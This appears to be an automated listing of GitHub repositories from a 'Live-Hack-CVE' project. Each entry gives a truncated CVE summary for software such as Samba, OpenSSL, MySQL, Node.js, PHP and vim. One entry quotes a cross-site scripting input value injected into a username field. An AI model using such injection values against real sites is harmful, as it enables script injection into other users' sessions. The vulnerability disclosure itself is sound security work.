**Samba before 4.7.3 might allow remote attackers to obtain sensitive information by leveraging failure of the server to clear allocated heap memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15275](https://github.com/Live-Hack-CVE/CVE-2017-15275) create time: 2022-12-30T01:50:10Z

**FS Stackoverflow Clone 1.0 has SQL Injection via the /question keywords parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17590](https://github.com/Live-Hack-CVE/CVE-2017-17590) create time: 2022-12-30T01:50:03Z

**There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL 1.0.2 before 1.0.2k and 1.1.0 before 1.1.0d. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks agains CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3732](https://github.com/Live-Hack-CVE/CVE-2017-3732) create time: 2022-12-30T01:49:52Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily "exploitable" vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3464](https://github.com/Live-Hack-CVE/CVE-2017-3464) create time: 2022-12-30T01:48:10Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise M CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3651](https://github.com/Live-Hack-CVE/CVE-2017-3651) create time: 2022-12-30T01:48:07Z

**An issue was discovered in Kirby 2.5.12. The application allows malicious HTTP requests to be sent in order to trick a user into adding web pages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14520](https://github.com/Live-Hack-CVE/CVE-2018-14520) create time: 2022-12-30T02:30:01Z

**An issue was discovered in Kirby 2.5.12. The delete page functionality suffers from a CSRF flaw. A remote attacker can craft a malicious CSRF page and force the user to delete a page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14519](https://github.com/Live-Hack-CVE/CVE-2018-14519) create time: 2022-12-30T02:29:57Z

**Samba from version 4.0.0 and before versions 4.7.12, 4.8.7, 4.9.3 is vulnerable to a denial of service. During the processing of an LDAP search before Samba's AD DC returns the LDAP entries to the client, the entries are cached in a single memory object with a maximum size of 256MB. When this size is reached, the Samba CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16851](https://github.com/Live-Hack-CVE/CVE-2018-16851) create time: 2022-12-30T01:53:49Z

**ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19935](https://github.com/Live-Hack-CVE/CVE-2018-19935) create time: 2022-12-30T01:53:43Z

**Samba from version 4.3.0 and before versions 4.7.12, 4.8.7 and 4.9.3 are vulnerable to a denial of service. When configured to accept smart-card authentication, Samba's KDC will call talloc_free() twice on the same memory if the principal in a validly signed certificate does not match the principal in the AS-REQ. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16841](https://github.com/Live-Hack-CVE/CVE-2018-16841) create time: 2022-12-30T01:53:25Z

**On a Samba 4 AD DC the LDAP server in all versions of Samba from 4.0.0 onwards incorrectly validates permissions to modify passwords over LDAP allowing authenticated users to change any other users' passwords, including administrative users and privileged service accounts (eg Domain Controllers). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1057](https://github.com/Live-Hack-CVE/CVE-2018-1057) create time: 2022-12-30T01:52:33Z

**Node.js versions 9.7.0 and later and 10.x are vulnerable and the severity is MEDIUM. A bug introduced in 9.7.0 increases the memory consumed when reading from the network into JavaScript using the net.Socket object directly as a stream. An attacker could use this cause a denial of service by sending tiny chunks of data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7164](https://github.com/Live-Hack-CVE/CVE-2018-7164) create time: 2022-12-30T01:51:35Z

**The `'path'` module in the Node.js 4.x release line contains a potential regular expression denial of service (ReDoS) vector. The code in question was replaced in Node.js 6.x and later so this vulnerability only impacts all versions of Node.js 4.x. The regular expression, `splitPathRe`, used within the `'path'` module CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7158](https://github.com/Live-Hack-CVE/CVE-2018-7158) create time: 2022-12-30T01:51:04Z

**Node.js: All versions prior to Node.js 6.15.0 and 8.14.0: HTTP request splitting: If Node.js can be convinced to use unsanitized user-provided Unicode data for the `path` option of an HTTP request, then data can be provided which will trigger a second, unexpected, and user-defined HTTP request to made to the same serve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12116](https://github.com/Live-Hack-CVE/CVE-2018-12116) create time: 2022-12-30T01:51:01Z

**Calling Buffer.fill() or Buffer.alloc() with some parameters can lead to a hang which could result in a Denial of Service. In order to address this vulnerability, the implementations of Buffer.alloc() and Buffer.fill() were updated so that they zero fill instead of hanging in these cases. All versions of Node.js 6.x (L CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7167](https://github.com/Live-Hack-CVE/CVE-2018-7167) create time: 2022-12-30T01:50:57Z

**The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-0734](https://github.com/Live-Hack-CVE/CVE-2018-0734) create time: 2022-12-30T01:50:32Z

**The OpenSSL ECDSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.1.1a (Affected 1.1.1). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-0735](https://github.com/Live-Hack-CVE/CVE-2018-0735) create time: 2022-12-30T01:50:28Z

**In Cloud Controller versions prior to 1.46.0, cf-deployment versions prior to 1.3.0, and cf-release versions prior to 283, Cloud Controller accepts refresh tokens for authentication where access tokens are expected. This exposes a vulnerability where a refresh token that would otherwise be insufficient to obtain an acc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1195](https://github.com/Live-Hack-CVE/CVE-2018-1195) create time: 2022-12-30T01:50:13Z

**A flaw was found in the way samba before 4.7.9 and 4.8.4 allowed the use of weak NTLMv1 authentication even when NTLMv1 was explicitly disabled. A man-in-the-middle attacker could use this flaw to read the credential and other details passed between the samba server and client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1139](https://github.com/Live-Hack-CVE/CVE-2018-1139) create time: 2022-12-30T01:50:07Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3058](https://github.com/Live-Hack-CVE/CVE-2018-3058) create time: 2022-12-30T01:48:02Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2813](https://github.com/Live-Hack-CVE/CVE-2018-2813) create time: 2022-12-30T01:47:59Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3066](https://github.com/Live-Hack-CVE/CVE-2018-3066) create time: 2022-12-30T01:47:36Z

**The VRRP parser in tcpdump before 4.9.3 has a buffer over-read in print-vrrp.c:vrrp_print() for VRRP version 2, a different vulnerability than CVE-2019-15167. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14463](https://github.com/Live-Hack-CVE/CVE-2018-14463) create time: 2022-12-30T02:30:37Z

**There is an issue in all samba 4.11.x versions before 4.11.5, all samba 4.10.x versions before 4.10.12 and all samba 4.9.x versions before 4.9.18, where the removal of the right to create or modify a subtree would not automatically be taken away on all domain controllers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14902](https://github.com/Live-Hack-CVE/CVE-2019-14902) create time: 2022-12-30T01:54:31Z

**A flaw was found in the way samba implemented an RPC endpoint emulating the Windows registry service API. An unprivileged attacker could use this flaw to create a new registry hive file anywhere they have unix permissions which could lead to creation of a new file in the Samba share. Versions before 4.8.11, 4.9.6 and 4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3880](https://github.com/Live-Hack-CVE/CVE-2019-3880) create time: 2022-12-30T01:53:56Z

**Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19246](https://github.com/Live-Hack-CVE/CVE-2019-19246) create time: 2022-12-30T01:53:46Z

**When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11047](https://github.com/Live-Hack-CVE/CVE-2019-11047) create time: 2022-12-30T01:52:43Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2739](https://github.com/Live-Hack-CVE/CVE-2019-2739) create time: 2022-12-30T01:49:04Z

**An invalid memory address reference was discovered in the adjABS function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27798](https://github.com/Live-Hack-CVE/CVE-2020-27798) create time: 2022-12-30T02:32:08Z

**An invalid memory address reference was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27797](https://github.com/Live-Hack-CVE/CVE-2020-27797) create time: 2022-12-30T02:32:04Z

**A heap-based buffer over-read was discovered in the get_le32 function in bele.h in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27800](https://github.com/Live-Hack-CVE/CVE-2020-27800) create time: 2022-12-30T02:32:00Z

**A heap-based buffer over-read was discovered in the acc_ua_get_be32 function in miniacc.h in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27799](https://github.com/Live-Hack-CVE/CVE-2020-27799) create time: 2022-12-30T02:31:56Z

**A heap-based buffer over-read was discovered in the get_le64 function in bele.h in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27801](https://github.com/Live-Hack-CVE/CVE-2020-27801) create time: 2022-12-30T02:31:52Z

**An floating point exception was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27802](https://github.com/Live-Hack-CVE/CVE-2020-27802) create time: 2022-12-30T02:31:48Z

**In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7064](https://github.com/Live-Hack-CVE/CVE-2020-7064) create time: 2022-12-30T01:53:18Z

**In PHP versions 7.3.x below 7.3.26, 7.4.x below 7.4.14 and 8.0.0, when validating URL with functions like filter_var($url, FILTER_VALIDATE_URL), PHP will accept an URL with invalid password as valid URL. This may lead to functions that rely on URL being valid to mis-parse the URL and produce wrong data as components of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7071](https://github.com/Live-Hack-CVE/CVE-2020-7071) create time: 2022-12-30T01:53:04Z

**A use-after-free flaw was found in the way samba AD DC LDAP servers, handled 'Paged Results' control is combined with the 'ASQ' control. A malicious user in a samba AD could use this flaw to cause denial of service. This issue affects all samba versions before 4.10.15, before 4.11.8 and before 4.12.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10700](https://github.com/Live-Hack-CVE/CVE-2020-10700) create time: 2022-12-30T01:52:57Z

**Kerberos Security Feature Bypass Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17049](https://github.com/Live-Hack-CVE/CVE-2020-17049) create time: 2022-12-30T01:52:10Z

**The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1971](https://github.com/Live-Hack-CVE/CVE-2020-1971) create time: 2022-12-30T01:50:43Z

**In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11080](https://github.com/Live-Hack-CVE/CVE-2020-11080) create time: 2022-12-30T01:50:25Z

**Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Success CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14550](https://github.com/Live-Hack-CVE/CVE-2020-14550) create time: 2022-12-30T01:49:28Z

**Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Success CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2752](https://github.com/Live-Hack-CVE/CVE-2020-2752) create time: 2022-12-30T01:48:30Z

**A flaw was found in the way Samba handled file/directory metadata. This flaw allows an authenticated attacker with permissions to read or modify share metadata, to perform this operation outside of the share. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20316](https://github.com/Live-Hack-CVE/CVE-2021-20316) create time: 2022-12-30T02:39:07Z

**A flaw was found in ansible-runner where the default temporary files configuration in ansible-2.0.0 are written to world R/W locations. This flaw allows an attacker to pre-create the directory, resulting in reading private information or forcing ansible-runner to write files as the legitimate user in a place they did n CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3701](https://github.com/Live-Hack-CVE/CVE-2021-3701) create time: 2022-12-30T02:38:53Z

**A flaw was found in the coreos-installer, where it writes the Ignition config to the target system with world-readable access permissions. This flaw allows a local attacker to have read access to potentially sensitive data. The highest threat from this vulnerability is to confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3917](https://github.com/Live-Hack-CVE/CVE-2021-3917) create time: 2022-12-30T02:38:38Z

**A flaw was found in the vhost library in DPDK. Function vhost_user_set_inflight_fd() does not validate `msg->payload.inflight.num_queues`, possibly causing out-of-bounds memory read/write. Any software using DPDK vhost library may crash as a result of this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3839](https://github.com/Live-Hack-CVE/CVE-2021-3839) create time: 2022-12-30T02:38:22Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3875](https://github.com/Live-Hack-CVE/CVE-2021-3875) create time: 2022-12-30T02:38:13Z

**A memory leak was found in Open vSwitch (OVS) during userspace IP fragmentation processing. An attacker could use this flaw to potentially exhaust available memory by keeping sending packet fragments. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3905](https://github.com/Live-Hack-CVE/CVE-2021-3905) create time: 2022-12-30T02:36:06Z

**A flaw was found in the Red Hat AMQ Broker management console in version 7.8 where an existing user is able to access some limited information even when the role the user is assigned to should not be allow access to the management console. The main impact is to confidentiality as this flaw means some role bindings are CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3763](https://github.com/Live-Hack-CVE/CVE-2021-3763) create time: 2022-12-30T02:36:03Z

**A flaw was found in Undertow. A buffer leak on the incoming WebSocket PONG message may lead to memory exhaustion. This flaw allows an attacker to cause a denial of service. The highest threat from this vulnerability is availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3690](https://github.com/Live-Hack-CVE/CVE-2021-3690) create time: 2022-12-30T02:35:50Z

**An unprivileged app can trigger PowerVR driver to return an uninitialized heap memory causing information disclosure.Product: AndroidVersions: Android SoCAndroid ID: A-236849490 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0891](https://github.com/Live-Hack-CVE/CVE-2021-0891) create time: 2022-12-30T02:30:41Z

**The method PVRSRVBridgeTLDiscoverStreams allocates puiStreamsInt on the heap, fills the contents of the buffer via TLServerDiscoverStreamsKM, and then copies the buffer to userspace. The method TLServerDiscoverStreamsKM may fail for several reasons including invalid sizes. If this method fails the buffer will be left u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0947](https://github.com/Live-Hack-CVE/CVE-2021-0947) create time: 2022-12-30T02:30:27Z

**The method PVRSRVBridgePMRPDumpSymbolicAddr allocates puiMemspaceNameInt on the heap, fills the contents of the buffer via PMR_PDumpSymbolicAddr, and then copies the buffer to userspace. The method PMR_PDumpSymbolicAddr may fail, and if it does the buffer will be left uninitialized and despite the error will still be c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0946](https://github.com/Live-Hack-CVE/CVE-2021-0946) create time: 2022-12-30T02:30:23Z

**The PowerVR GPU driver allows unprivileged apps to allocated pinned memory, unpin it (which makes it available to be freed), and continue using the page in GPU calls. No privileges required and this results in kernel memory corruption.Product: AndroidVersions: Android SoCAndroid ID: A-232440670 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39815](https://github.com/Live-Hack-CVE/CVE-2021-39815) create time: 2022-12-30T02:30:16Z

**An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the uri-template-lite npm package, when an attacker is able to supply arbitrary input to the "URI.expand" method CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43309](https://github.com/Live-Hack-CVE/CVE-2021-43309) create time: 2022-12-30T02:30:12Z

**A flaw was found in JSS, where it did not properly free up all memory. Over time, the wasted memory builds up in the server memory, saturating the server’s RAM. This flaw allows an attacker to force the invocation of an out-of-memory process, causing a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4213](https://github.com/Live-Hack-CVE/CVE-2021-4213) create time: 2022-12-30T02:29:27Z

**A arbitrary code execution flaw was found in the Fabric 8 Kubernetes client affecting versions 5.0.0-beta-1 and above. Due to an improperly configured YAML parsing, this will allow a local and privileged attacker to supply malicious YAML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4178](https://github.com/Live-Hack-CVE/CVE-2021-4178) create time: 2022-12-30T02:29:23Z

**A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4155](https://github.com/Live-Hack-CVE/CVE-2021-4155) create time: 2022-12-30T02:29:19Z

**The Candlepin component of Red Hat Satellite was affected by an improper authentication flaw. Few factors could allow an attacker to use the SCA (simple content access) certificate for authentication with Candlepin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4142](https://github.com/Live-Hack-CVE/CVE-2021-4142) create time: 2022-12-30T01:56:42Z

**It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4125](https://github.com/Live-Hack-CVE/CVE-2021-4125) create time: 2022-12-30T01:56:39Z

**It was found that a specially crafted LUKS header could trick cryptsetup into disabling encryption during the recovery of the device. An attacker with physical access to the medium, such as a flash disk, could use this flaw to force a user into permanently disabling the encryption layer of that medium. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4122](https://github.com/Live-Hack-CVE/CVE-2021-4122) create time: 2022-12-30T01:56:35Z

**A flaw was found in ansible-runner. An improper escaping of the shell command, while calling the ansible_runner.interface.run_command, can lead to parameters getting executed as host's shell command. A developer could unintentionally write code that gets executed in the host rather than the virtual environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4041](https://github.com/Live-Hack-CVE/CVE-2021-4041) create time: 2022-12-30T01:56:32Z

**An integer overflow issue was discovered in ImageMagick's ExportIndexQuantum() function in MagickCore/quantum-export.c. Function calls to GetPixelIndex() could result in values outside the range of representable for the 'unsigned char'. When ImageMagick processes a crafted pdf file, this could lead to an undefined beha CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20224](https://github.com/Live-Hack-CVE/CVE-2021-20224) create time: 2022-12-30T01:56:00Z

**A flaw was found in AMQ Broker. This issue can cause a partial interruption to the availability of AMQ Broker via an Out of memory (OOM) condition. This flaw allows an attacker to partially disrupt availability to the broker through a sustained attack of maliciously crafted messages. The highest threat from this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4040](https://github.com/Live-Hack-CVE/CVE-2021-4040) create time: 2022-12-30T01:55:37Z

**A flaw was found in the Linux kernel. Measuring usage of the shared memory does not scale with large shared memory segment counts which could lead to resource exhaustion and DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3669](https://github.com/Live-Hack-CVE/CVE-2021-3669) create time: 2022-12-30T01:55:33Z

**MaxQueryDuration not honoured in Samba AD DC LDAP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3670](https://github.com/Live-Hack-CVE/CVE-2021-3670) create time: 2022-12-30T01:55:09Z

**A flaw was found in openCryptoki. The openCryptoki Soft token does not check if an EC key is valid when an EC key is created via C_CreateObject, nor when C_DeriveKey is used with ECDH public data. This may allow a malicious user to extract the private key by performing an invalid curve attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3798](https://github.com/Live-Hack-CVE/CVE-2021-3798) create time: 2022-12-30T01:55:02Z

**A flaw was found in the Linux kernels memory deduplication mechanism. Previous work has shown that memory deduplication can be attacked via a local exploitation mechanism. The same technique can be used if an attacker can upload page sized files and detect the change in access time from a networked service to determine CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3714](https://github.com/Live-Hack-CVE/CVE-2021-3714) create time: 2022-12-30T01:54:58Z

**A race condition flaw was found in ansible-runner, where an attacker could watch for rapid creation and deletion of a temporary directory, substitute their directory at that name, and then have access to ansible-runner's private_data_dir the next time ansible-runner made use of the private_data_dir. The highest Threat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3702](https://github.com/Live-Hack-CVE/CVE-2021-3702) create time: 2022-12-30T01:54:55Z

**Microsoft Exchange Server Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42321](https://github.com/Live-Hack-CVE/CVE-2021-42321) create time: 2022-12-30T01:54:44Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3973](https://github.com/Live-Hack-CVE/CVE-2021-3973) create time: 2022-12-30T01:54:41Z

**Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return value is mishandled by OpenSSL and will cause an IO function (such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4044](https://github.com/Live-Hack-CVE/CVE-2021-4044) create time: 2022-12-30T01:50:50Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0044. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2343](https://github.com/Live-Hack-CVE/CVE-2022-2343) create time: 2022-12-30T02:39:31Z

**Use After Free in GitHub repository vim/vim prior to 9.0.0046. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2345](https://github.com/Live-Hack-CVE/CVE-2022-2345) create time: 2022-12-30T02:39:27Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2206](https://github.com/Live-Hack-CVE/CVE-2022-2206) create time: 2022-12-30T02:39:23Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2257](https://github.com/Live-Hack-CVE/CVE-2022-2257) create time: 2022-12-30T02:39:19Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2284](https://github.com/Live-Hack-CVE/CVE-2022-2284) create time: 2022-12-30T02:39:15Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2286](https://github.com/Live-Hack-CVE/CVE-2022-2286) create time: 2022-12-30T02:39:11Z

**A vulnerability classified as problematic has been found in ConsoleTVs Noxen. Affected is an unknown function of the file /Noxen-master/users.php. The manipulation of the argument create_user_username with the input ">alert(/xss/) leads to cross site scripting. It is possible to launch the attack remot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2956](https://github.com/Live-Hack-CVE/CVE-2022-2956) create time: 2022-12-30T02:39:04Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2182](https://github.com/Live-Hack-CVE/CVE-2022-2182) create time: 2022-12-30T02:39:00Z

**A directory traversal vulnerability exists in the unzipDirectory functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30547](https://github.com/Live-Hack-CVE/CVE-2022-30547) create time: 2022-12-30T02:38:57Z

**Uncontrolled Recursion in GitHub repository vim/vim prior to 8.2.4975. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1771](https://github.com/Live-Hack-CVE/CVE-2022-1771) create time: 2022-12-30T02:38:49Z

**Use After Free in GitHub repository vim/vim prior to 8.2.4979. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1796](https://github.com/Live-Hack-CVE/CVE-2022-1796) create time: 2022-12-30T02:38:45Z

**Microsoft Exchange Server Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23277](https://github.com/Live-Hack-CVE/CVE-2022-23277) create time: 2022-12-30T02:38:42Z

**Buffer Over-read in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2175](https://github.com/Live-Hack-CVE/CVE-2022-2175) create time: 2022-12-30T02:38:34Z

**NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.5163. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2208](https://github.com/Live-Hack-CVE/CVE-2022-2208) create time: 2022-12-30T02:38:30Z

**ServiceNow through San Diego Patch 4b and Patch 6 allows reflected XSS in the logout functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38463](https://github.com/Live-Hack-CVE/CVE-2022-38463) create time: 2022-12-30T02:38:26Z

**Improper Restriction of Rendered UI Layers or Frames in GitHub repository notrinos/notrinoserp prior to 0.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2965](https://github.com/Live-Hack-CVE/CVE-2022-2965) create time: 2022-12-30T02:38:19Z

**heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1160](https://github.com/Live-Hack-CVE/CVE-2022-1160) create time: 2022-12-30T02:38:00Z

**ServiceNow through San Diego Patch 3 allows XSS via the name field during creation of a new dashboard for the Performance Analytics dashboard. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38172](https://github.com/Live-Hack-CVE/CVE-2022-38172) create time: 2022-12-30T02:37:56Z

